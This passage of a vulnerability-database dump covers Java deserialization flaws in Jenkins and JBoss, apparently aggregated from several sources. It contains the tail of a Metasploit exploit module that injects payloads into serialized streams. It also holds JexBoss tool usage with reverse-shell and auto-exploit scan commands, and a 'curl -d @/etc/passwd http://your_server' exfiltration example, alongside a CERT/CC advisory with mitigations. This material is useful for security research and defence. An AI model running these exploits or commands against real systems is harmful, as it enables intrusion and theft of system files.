fail_with(Failure::Unknown, 'The connection timed out.')\n end\n\n http_headers = res.headers\n\n unless http_headers['X-Jenkins-CLI-Port']\n vprint_error('The server does not have the CLI port that is needed for exploitation.')\n return false\n end\n\n if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637\n @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i\n return true\n end\n\n false\n end\n\n # Connects to the server, creates a request, sends the request,\n # reads the response\n #\n # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.\n #\n def send_request_cgi(opts={}, timeout = 20)\n if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0\n actual_timeout = datastore['HttpClientTimeout']\n else\n actual_timeout = opts[:timeout] || timeout\n end\n\n begin\n c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])\n c.connect\n r = c.request_cgi(opts)\n c.send_recv(r, actual_timeout)\n rescue 
::Errno::EPIPE, ::Timeout::Error\n nil\n end\n end\n\n def invoke_remote_method(serialized_java_stream)\n begin\n socket = connect(true, {'RPORT' => cli_port})\n\n print_status 'Sending headers...'\n socket.put(read_bin_file('serialized_jenkins_header'))\n\n vprint_status(socket.recv(1024))\n vprint_status(socket.recv(1024))\n\n encoded_payload0 = read_bin_file('serialized_payload_header')\n encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)\n encoded_payload2 = read_bin_file('serialized_payload_footer')\n\n encoded_payload = \"#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}\"\n print_status \"Sending payload length: #{encoded_payload.length}\"\n socket.put(encoded_payload)\n ensure\n disconnect(socket)\n end\n\n end\n\n def print_status(msg='')\n super(\"#{rhost}:#{rport} - #{msg}\")\n end\n\n #\n # Serialized stream generated with:\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java\n #\n def set_payload\n stream = Rex::Java::Serialization::Model::Stream.new\n\n handle = File.new(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", 'serialized_file_writer' ), 'rb')\n decoded = stream.decode(handle)\n handle.close\n\n inject_payload_into_stream(decoded).encode\n end\n\n #\n # Serialized stream generated with:\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java\n #\n def class_load_payload\n stream = Rex::Java::Serialization::Model::Stream.new\n handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')\n decoded = stream.decode(handle)\n handle.close\n inject_class_loader_into_stream(decoded).encode\n end\n\n def inject_class_loader_into_stream(decoded)\n file_name_utf8 = get_array_chain(decoded)\n .values[2]\n .class_data[0]\n .values[1]\n .values[0]\n .values[0]\n .class_data[3]\n file_name_utf8.contents = 
get_random_file_name\n file_name_utf8.length = file_name_utf8.contents.length\n class_name_utf8 = get_array_chain(decoded)\n .values[4]\n .class_data[0]\n .values[0]\n class_name_utf8.contents = 'metasploit.Payload'\n class_name_utf8.length = class_name_utf8.contents.length\n decoded\n end\n\n def get_random_file_name\n @random_file_name ||= \"#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], \"#{rand_text_alpha(4 + rand(4))}.jar\")}\"\n end\n\n def inject_payload_into_stream(decoded)\n byte_array = get_array_chain(decoded)\n .values[2]\n .class_data\n .last\n byte_array.values = payload.encoded.bytes\n file_name_utf8 = decoded.references[44].class_data[0]\n rnd_fname = get_random_file_name\n register_file_for_cleanup(rnd_fname)\n file_name_utf8.contents = rnd_fname\n file_name_utf8.length = file_name_utf8.contents.length\n decoded\n end\n\n def get_array_chain(decoded)\n object = decoded.contents[0]\n lazy_map = object.class_data[1].class_data[0]\n chained_transformer = lazy_map.class_data[0]\n chained_transformer.class_data[0]\n end\n\n def read_bin_file(bin_file_path)\n data = ''\n\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", bin_file_path ), 'rb') do |f|\n data = f.read\n end\n\n data\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/jenkins_java_deserialize.rb"}], "pentestit": [{"lastseen": "2017-08-11T08:07:48", "bulletinFamily": "blog", "description": "PenTestIT RSS Feed\n\nI was working with a customers Red Hat JBoss server today and wanted to test for affected deserialization vulnerabilities. Though my favourite go-to tool - the Burp Suite has many extensions, I wanted to try something that I had not before. That's when I stumbled across **JexBoss**, which turned out to be a pretty decent [open source](<http://pentestit.com/tag/open-source/>) tool. 
I think _JexBoss_ is a play on the words Java EXploitation like a Boss.\n\n\n\n## What is JexBoss?\n\nJexBoss is an open source tool in Python to help you exploit and verify Java and Red Hat JBoss deserialization vulnerabilities. As we all know, serialization converts an object's state to a byte stream so that a copy of the same object can be obtained by reverting the byte stream itself. Conversely, to deserialize is to reverse serialization, i.e., taking the serialized data to rebuild it into the original object. This is easy to abuse in Java, as there are no checks on the classes that can be deserialized.\n\n## Features of JexBoss:\n\nThe tool and exploits were developed and tested for:\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), DNS gadget, Remote JMX (CVE-2016-3427, CVE-2016-8735), Apache Struts2 Jakarta Multipart parser CVE-2017-5638, etc.)\n * Supported exploitation vectors are: \n * /_admin-console_: Tested and working in JBoss versions 5 and 6.\n * /_jmx-console_: Tested and working in JBoss versions 4, 5 and 6.\n * /_jmx-console_/_HtmlAdaptor_: Tested and working in JBoss versions 4, 5 and 6.\n * /_web-console_/_Invoker_: Tested and working in JBoss versions 4, 5 and 6.\n * /_invoker_/_JMXInvokerServlet_: Tested and working in JBoss versions 4, 5 and 6.\n * Application Deserialization: Tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters.\n * Servlet Deserialization: Tested and working against multiple java applications, platforms, etc, via servlets that process serialized objects.\n * Apache Struts2 Jakarta Multipart ([CVE-2017-5638](<http://pentestit.com/tag/CVE-2017-5638/>)): Tested against Apache Struts 2 applications.\n * Tries to authenticate to /_admin-console_/_login.seam_ using default user name and 
password - admin:admin.\n * Sends exploits with proper headers alternating with random User-Agent string.\n * Proxy support.\n * Auto scan and file scan modes.\n\nWith the auto scan and file scan modes, you can leverage this tool to launch a mass-scan against your own network in a short duration of time. Additionally, a payload also allows you to gain access to a reverse shell with Metasploit meterpreter support. More good news is that JexBoss is compatible with both Python 2 and Python 3. It also includes an auto-updater.\n\n## Download JexBoss:\n\nAs always, the current version - JexBoss version 1.2.4 - can be obtained by checking out the GIT repository from [**here**](<https://github.com/joaomatosf/jexboss>).\n\nThe post [JexBoss: Java Deserialization Verification & EXploitation Tool!](<http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/>) appeared first on [PenTestIT](<http://pentestit.com>).", "modified": "2017-08-11T06:52:45", "published": "2017-08-11T06:52:45", "id": "PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "href": "http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/", "title": "JexBoss: Java Deserialization Verification & EXploitation Tool!", "type": "pentestit", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2019-12-02T07:42:12", "bulletinFamily": "tools", "description": "JexBoss is a tool for testing and exploiting [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) in JBoss Application Server and other Java Platforms, Frameworks, Applications, etc. 
\n \n** Requirements ** \n\n\n * Python >= 2.7.x \n * [ urllib3 ](<https://pypi.python.org/pypi/urllib3>)\n * [ ipaddress ](<https://pypi.python.org/pypi/ipaddress>)\n \n** Installation on Linux\\Mac ** \nTo install the latest version of JexBoss, please use the following commands: \n\n \n \n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n OR:\n \n Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip\n unzip master.zip\n cd jexboss-master\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n\nIf you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl: \n\n \n \n yum -y install centos-release-scl\n yum -y install python27\n scl enable python27 bash\n\n \n** Installation on Windows ** \nIf you are using Windows, you can use the [ Git Bash ](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>) to run the JexBoss. Follow the steps below: \n\n\n * Download and install [ Python ](<https://www.python.org/downloads/release/python-2712/>)\n * Download and install [ Git for Windows ](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>)\n * After installing, run the Git for Windows and type the following commands: \n \n \n PATH=$PATH:C:\\Python27\\\n PATH=$PATH:C:\\Python27\\Scripts\n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n\n \n** Features ** \nThe tool and [ exploits ](<https://www.kitploit.com/search/label/Exploits>) were developed and tested for: \n\n\n * JBoss Application Server versions: 3, 4, 5 and 6. 
\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc) \nThe exploitation vectors are: \n\n\n * /admin-console \n * tested and working in JBoss versions 5 and 6 \n * /jmx-console \n * tested and working in JBoss versions 4, 5 and 6 \n * /web-console/Invoker \n * tested and working in JBoss versions 4, 5 and 6 \n * /invoker/JMXInvokerServlet \n * tested and working in JBoss versions 4, 5 and 6 \n * Application Deserialization \n * tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters \n * Servlet Deserialization \n * tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an \"Invoker\" in a link) \n * Apache Struts2 CVE-2017-5638 \n * tested in [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 applications \n * Others \n \n** Videos ** \n\n\n * Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss \n\n \n\n\n * Exploiting JBoss Application Server with JexBoss \n\n \n\n\n * Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638) \n\n \n \n** Screenshots ** \n\n\n * Simple usage examples: \n \n \n $ python jexboss.py\n\n \n\n\n[  ](<https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s1600/jexboss_4_simple_usage_help.png>)\n\n \n\n\n * Example of standalone mode against JBoss: \n \n \n $ python jexboss.py -u http://192.168.0.26:8080\n\n \n\n\n[  ](<https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s1600/jexboss_5_standalone_mode1.png>)\n\n \n\n\n[  
](<https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s1600/jexboss_6_standalone_mode2.png>)\n\n * Usage modes: \n \n \n $ python jexboss.py -h\n\n * Network scan mode: \n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s1600/jexboss_7_network_scan_mode.png>)\n\n \n\n\n * Network scan with auto-exploit mode: \n \n \n $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s1600/jexboss_8_scan_with_auto_exploit_mode.png>)\n\n \n\n\n * Results and recommendations: \n\n[  ](<https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s1600/jexboss_9_results_and_recommendations2.png>)\n\n \n \n** Reverse Shell (meterpreter integration) ** \nAfter you exploit a JBoss server, you can use the own [ jexboss ](<https://www.kitploit.com/search/label/JexBoss>) command shell or perform a reverse connection using the following command: \n\n \n \n jexremote=YOUR_IP:YOUR_PORT\n \n Example:\n Shell>jexremote=192.168.0.10:4444\n\n * Example: [ ](<https://github.com/joaomatosf/jexboss/raw/master/screenshots/jexbossreverse2.jpg>)\n\n[  ](<https://4.bp.blogspot.com/-DTLzz6fknAc/Wi9wlav0sMI/AAAAAAAAJpQ/Au8e57VCaooIR0iX0fH3qqPHYZvsrDHoQCLcBGAs/s1600/jexboss_10_jexbossreverse2.jpeg>)\n\n \n\n\nWhen exploiting java deserialization [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute. 
\n \n** Usage examples ** \n\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server: \n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl [email\u00a0protected]/etc/passwd http://your_server'\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host): \n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name\n\n * For Java Deserialization Vulnerabilities in a Servlet (like Invoker): \n \n \n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n\n * For [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638) \n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2\n\n * For [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638) with [ cookies ](<https://www.kitploit.com/search/label/Cookies>) for authenticated resources \n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"\n\n * Auto scan mode: \n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log\n\n * File scan mode: \n \n \n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n\n * More Options: \n \n \n optional arguments:\n -h, --help show this help message and exit\n --version show program's version number and exit\n --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE\n PERMISSION!!!)\n --disable-check-updates, -D\n Disable two updates checks: 1) Check for updates\n performed by the webshell in exploited server at\n http://webshell.jexboss.net/jsp_version.txt and 2)\n check for 
updates performed by the jexboss client at\n http://joaomatosf.com/rnp/releases.txt\n -mode {standalone,auto-scan,file-scan}\n Operation mode (DEFAULT: standalone)\n --app-unserialize, -j\n Check for java unserialization vulnerabilities in HTTP\n parameters (eg. javax.faces.ViewState, oldFormData,\n etc)\n --servlet-unserialize, -l\n Check for java unserialization vulnerabilities in\n Servlets (like Invoker interfaces)\n --jboss Check only for JBOSS vectors.\n --jenkins Check only for Jenkins CLI vector.\n --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat\n (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be\n checked by default.\n --proxy PROXY, -P PROXY\n Use a http proxy to connect to the target URL (eg. -P\n http://192.168.0.1:3128)\n --proxy-cred LOGIN:PASS, -L LOGIN:PASS\n Proxy authentication credentials (eg -L name:password)\n --jboss-login LOGIN:PASS, -J LOGIN:PASS\n JBoss login and password for exploit admin-console in\n JBoss 5 and JBoss 6 (default: admin:admin)\n --timeout TIMEOUT Seconds to wait before timeout connection (default 3)\n \n Standalone mode:\n -host HOST, -u HOST Host address to be checked (eg. -u\n http://192.168.0.10:8080)\n \n Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):\n --reverse-host RHOST:RPORT, -r RHOST:RPORT\n Remote host address and port for reverse shell when\n exploiting Java Deserialization Vulnerabilities in\n application layer (for now, working only against *nix\n systems)(eg. 192.168.0.10:1331)\n --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d\n @/etc/passwd http://your_server)\n --windows, -w Specifies that the commands are for rWINDOWS System$\n (cmd.exe)\n --post-parameter PARAMETER, -H PARAMETER\n Specify the parameter to find and inject serialized\n objects into it. (egs. 
-H javax.faces.ViewState or -H\n oldFormData (<- Hi PayPal =X) or others) (DEFAULT:\n javax.faces.ViewState)\n --show-payload, -t Print the generated payload.\n --gadget {commons-collections3.1,commons-collections4.0,groovy1}\n Specify the type of Gadget to generate the payload\n automatically. (DEFAULT: commons-collections3.1 or\n groovy1 for JenKins)\n --load-gadget FILENAME\n Provide your own gadget from file (a java serialized\n object in RAW mode)\n --force, -F Force send java serialized gadgets to URL informed in\n -u parameter. This will send the payload in multiple\n formats (eg. RAW, GZIPED and BASE64) and with\n different Content-Types.\n \n Auto scan mode:\n -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)\n -ports PORTS List of ports separated by commas to be checked for\n each host (eg. 8080,8443,8888,80,443)\n -results FILENAME File name to store the auto scan results\n \n File scan mode:\n -file FILENAME_HOSTS Filename with host list to be scanned (one host per\n line)\n -out FILENAME_RESULTS\n File name to store the file scan results\n \n\n \n \n\n\n** [ Download JexBoss ](<https://github.com/joaomatosf/jexboss>) **\n", "modified": "2017-12-18T21:14:35", "published": "2017-12-18T21:14:35", "id": "KITPLOIT:5230099254245458698", "href": "http://www.kitploit.com/2017/12/jexboss-jboss-and-others-java.html", "title": "JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2019-10-09T19:48:59", "bulletinFamily": "info", "description": "### Overview \n\nThe Apache Commons Collections (ACC) library is vulnerable to insecure deserialization of data, which may result in arbitrary code execution. 
Java applications that either directly use ACC, or contain ACC in their classpath, may be vulnerable to arbitrary code execution.\n\n### Description \n\n[**CWE-502**](<http://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data - **CVE-2015-6420\n\nIn January 2015, at AppSec California 2015, researchers [Gabriel Lawrence and Chris Frohoff](<http://frohoff.github.io/appseccali-marshalling-pickles/>) described how many Java applications and libraries using Java Object Serialization may be vulnerable to insecure deserialization of data, which may result in arbitrary code execution. Any Java library or application that utilizes this functionality incorrectly may be impacted by this vulnerability. \n \nIn November 2015, [Stephen Breen of Foxglove Security](<http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>) identified the [Apache Commons Collections](<https://commons.apache.org/proper/commons-collections/>) (ACC) Java library as being vulnerable to insecure deserialization of data; specifically, the ACC `InvokerTransformer` class may allow arbitrary code execution when used to deserialize data from untrusted sources. According to the researcher, this issue affects several large projects that utilize ACC including WebSphere, JBoss, [Jenkins](<https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>), [WebLogic](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179>), and OpenNMS. Unify also reports that [OpenScape](<https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>) software is affected. In addition, [Cisco](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20>) has released an advisory for their products. 
\n \nBoth [versions 3.2.1 and 4.0](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) of the Apache Commons Collections library have been identified as being vulnerable to this deserialization issue. \n \nThe Apache Software Foundation has released a [statement](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) regarding this issue, which contains advice for mitigating the issue, as well as further references and links. A [bug](<https://issues.apache.org/jira/browse/COLLECTIONS-580>) tracker entry has been filed to track progress toward a full solution. \n \nOther libraries, such as Groovy and Spring, are currently being investigated for similar flaws. Lawrence and Frohoff's presentation describes how applications and libraries written in other languages, such as Python and Ruby, may also be vulnerable to the same type of issue. It is generally up to software designers to follow best practices for security when handling serialized data, no matter the programming language or library used. \n \n--- \n \n### Impact \n\nA Java application or library with the Apache Commons Collections library in its classpath may be coerced into executing arbitrary Java functions or bytecode. \n \nWhile many applications do not actively use serialization or deserialization, they often rely on libraries that do. If a class uses deserialization on some input stream (either a file or socket), and an attacker can send malicious data down that stream, the attacker can cause the program to construct objects of any class on its classpath (whether it uses those classes or not). And some classes, such as those in the ACC, automatically execute code based on attacker-supplied deserialization input. \n \nAn application that neither uses deserialization, nor employs any libraries that use deserialization, would not be vulnerable to this problem. 
Such an application should also lack a plugin architecture, or any mechanism for loading code that might use deserialization. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of a full solution to this problem, but you may consider the following: \n \n**Apply an update** \n \nApache Commons Collections [version 3.2.2](<https://commons.apache.org/proper/commons-collections/download_collections.cgi>) and [version 4.1](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>) have been released. These new releases mitigate the vulnerability by disabling the insecure functionality. \n \n**Developers need to re-architect their applications, and should be suspicious of deserialized data from untrusted sources** \n \nDevelopers will need to make further architectural changes to secure their applications before they can re-enable functionality in ACC version 3.2.2 and later. From Apache's statement: \n \n_However, to be clear: this is not the only known and especially not unknown useable gadget. So replacing your installations with a hardened version of Apache Commons Collections will not make your application resist this vulnerability. _ \n \nDevelopers should in general be very suspicious of deserialized data from an untrusted source. For best practices, see the [CERT Oracle Coding Standard for Java](<https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>) guidelines for Serialization, especially rules [SER12-J](<https://www.securecoding.cert.org/confluence/display/java/SER12-J.+Prevent+deserialization+of+untrusted+classes>) and [SER13-J](<https://www.securecoding.cert.org/confluence/display/java/SER13-J.+Treat+data+to+be+deserialized+as+potentially+malicious+by+default>). \n \n**Use firewall rules or filesystem restrictions** \n \nSystem administrators may be able to mitigate this issue for some applications by restricting access to the network and/or filesystem. 
If an affected application, such as Jenkins, utilizes an open port accepting serialized objects, restricting access to the application may help mitigate the issue. \n \n--- \n \n### Vendor Information\n\n576313\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Apache Software Foundation\n\nUpdated: November 10, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Cisco\n\nUpdated: July 18, 2017 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nCisco has released a [security advisory](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>) and list of affected products at the URL below. Cisco has assigned CVE-2015-6420 to this issue.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n\n### Addendum\n\nAs of 2017-07-18, CERT/CC is aware of a report that Cisco Unity Express (CUE) 8.6.1 is still vulnerable to this issue and is incorrectly identified as \"not vulnerable\" in the above Cisco advisory. 
We have reached out to Cisco for clarification.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23576313 Feedback>).\n\n### __ __ IBM Corporation\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nIBM has released a security advisory for WebSphere at the following URL:\n\n### Vendor References\n\n * <http://www-01.ibm.com/support/docview.wss?uid=swg21970575>\n\n### __ __ Jenkins\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nJenkins has released a security advisory at the URL below. CVE-2015-8103 was assigned this issue in Jenkins.\n\n### Vendor References\n\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n\n### __ __ Oracle Corporation\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nOracle has released a security advisory at the URL below:\n\n### Vendor References\n\n * [http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 ](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179\n>)\n * <https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852>\n\n### __ __ Unify Inc\n\nUpdated: November 30, 2015 \n\n**Statement Date: November 24, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"Unify is affected in two product lines as listed below. 
For details refer to the information given in the Security Advisory OBSO-1511-01.\n\nWe recommend all customers to apply the mitigations described in the advisory and install the corresponding product fix releases as soon as available. \nTo get notified about Advisory updates, subscribe as listed in `<https://www.unify.com/security/advisories>`.\"\n\n### Vendor Information\n\nUnify has issued Security Advisory OBSO-1511-01 at the URL listed below. \n \nMitre had assigned two CVE IDs for Unify products impacted by VU#576313: \n \nCVE-2015-8237, affected products: \nUnify OpenScape Fault Management V7 (\"cpe:/a:unify:openscape_fault_management:7.%02\") \nUnify OpenScape Fault Management V8 (\"cpe:/a:unify:openscape_fault_management:8.%02\") \n \nCVE-2015-8238, affected products: \nUnify OpenScape UC Application V7 (\"cpe:/a:unify:openscape_uc_application:7.%02\") \nUnify OpenScape Common Management Platform V7 (\"cpe:/a:unify:openscape_common_management_platform:7.%02\")\n\n### Vendor References\n\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n\n### __ __ Red Hat, Inc.\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nJBOSS has been reported as being affected.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.4 | E:POC/RL:W/RC:C \nEnvironmental | 6.4 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>\n * <https://issues.apache.org/jira/browse/COLLECTIONS-580>\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n * 
[http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 ](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 >)\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n * <http://www.openwall.com/lists/oss-security/2015/11/11/3>\n * <http://www.infoq.com/news/2015/11/commons-exploit>\n * <https://tersesystems.com/2015/11/08/closing-the-open-door-of-java-object-serialization/>\n * <http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>\n * <http://mail-archives.apache.org/mod_mbox/commons-dev/201511.mbox/%3c20151106222553.00002c57.ecki@zusammenkunft.net%3e>\n * <http://frohoff.github.io/appseccali-marshalling-pickles/>\n * <http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles>\n * <https://www.youtube.com/watch?v=VviY3O-euVQ>\n * <https://commons.apache.org/proper/commons-collections/>\n * <http://cwe.mitre.org/data/definitions/502.html>\n * <https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>\n * <http://www.oracle.com/technetwork/java/seccodeguide-139067.html#8>\n\n### Acknowledgements\n\nThis type of vulnerability was reported publicly by Gabriel Lawrence and Chris Frohoff, and later investigated by Stephen Breen.\n\nThis document was written by Garret Wassermann with assistance from David Svoboda and the CERT Secure Coding team.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-6420](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6420>) \n---|--- \n**Date Public:** | 2015-01-28 \n**Date First Published:** | 2015-11-13 \n**Date Last Updated: ** | 2018-08-27 17:57 UTC \n**Document Revision: ** | 88 \n", "modified": "2018-08-27T17:57:00", "published": "2015-11-13T00:00:00", "id": "VU:576313", "href": 
